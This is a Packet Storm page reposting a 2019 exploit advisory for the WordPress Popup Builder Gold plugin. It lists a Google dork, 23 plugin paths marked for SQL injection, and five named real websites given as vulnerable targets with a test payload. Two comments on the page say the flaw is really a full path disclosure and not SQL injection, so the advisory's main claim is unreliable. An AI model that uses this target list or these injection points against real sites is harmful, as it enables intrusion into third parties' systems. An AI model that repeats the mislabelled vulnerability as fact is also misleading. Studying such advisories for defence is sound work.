what you don't know can hurt you

WordPress Popup Builder Gold 3.1.5.2 SQL Injection

WordPress Popup Builder Gold 3.1.5.2 SQL Injection
Posted Jan 28, 2019
Authored by KingSkrupellos

WordPress Popup Builder Gold plugin version 3.1.5.2 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 73f174d5372b2f490a446deb9df24980

WordPress Popup Builder Gold 3.1.5.2 SQL Injection

Change Mirror Download
####################################################################

# Exploit Title : WordPress Popup Builder Gold Plugins 3.1.5.2 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/01/2019
# Vendor Homepage : popup-builder.com
# Software Download Link : downloads.wordpress.org/plugin/popup-builder.3.1.5.2.zip
# Software Information Link : wordpress.org/plugins/popup-builder/
# Software Version : 3.1.5.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/popup-builder-gold/''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# Description about Software :
***************************

Popup Builder Pro [ Gold ] Responsive WordPress Pop up Subscription & Newsletter =>

Pop up anything with Popup Builder, create and manage powerful promotion modal popups

for your WordPress blog or website. Powerful, and yet, easy to use this plugin that

will help you to grab your visitors attention to introduce them your

offers, discounts or other kind of promotional notices.

####################################################################

# Impact :
**********

* WordPress Popup Builder Gold Plugins 3.1.5.2 is prone to an

SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied

data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read,

access or modify data, or exploit latent vulnerabilities in the underlying database.

If the webserver is misconfigured, read & write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
***********************

/wp-content/plugins/popup-builder-gold/config.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/popup-builderPro.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/sg_admin_post.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/sg_popup_ajax.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/sg_popup_create.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/sg_popup_create_new.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/sg_popup_main.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/sg_popup_media_button.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/sg_popup_page_selection.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/sg_popup_save.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/sg_popup_settings.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/sg_subscribers.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/main_section/ageRestriction.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/main_section/contactForm.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/main_section/countdown.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/main_section/exitIntent.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/main_section/fblike.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/main_section/html.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/main_section/social.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/main_section/subscription.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/options_section/exitIntent.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/options_section/pro.php?id=[SQL Injection]

/wp-content/plugins/popup-builder-gold/files/options_section/social.php?id=[SQL Injection]

####################################################################

# Example Vulnerable Sites :
*************************

[+] fincacanada.org/wp-content/plugins/popup-builder-gold/config.php?id=1%27

[+] tusojoseyecare.net/wp-content/plugins/popup-builder-gold/config.php?id=1%27

[+] southyubaclub.com/wp-content/plugins/popup-builder-gold/config.php?id=1%27

[+] blog.fimple.tv/wp-content/plugins/popup-builder-gold/config.php?id=1%27

[+] myomy.co.il/wp-content/plugins/popup-builder-gold/config.php?id=1%27

####################################################################

# SQL Database Error :
***********************

Fatal error: Uncaught Error: Call to undefined function plugins_url() in /home/finca520
/public_html/wp-content/plugins/popup-builder-gold/config.php:4 Stack trace: #0
{main} thrown in /home/finca520/public_html/wp-content/plugins
/popup-builder-gold/config.php on line 4

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Comments (2)

RSS Feed Subscribe to this comment feed
gilzow

*NOT* a SQL Injection. This is a fullpath disclosure vulnerability. Completely different.

Comment by gilzow
2019-02-01 18:38:55 UTC | Permalink | Reply
gilzow

*NOT* a SQL Injection. This is a fullpath disclosure vulnerability. Completely different.

Comment by gilzow
2019-02-01 18:39:46 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    2 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    16 Files
  • 13
    Feb 13th
    19 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    20 Files
  • 20
    Feb 20th
    34 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close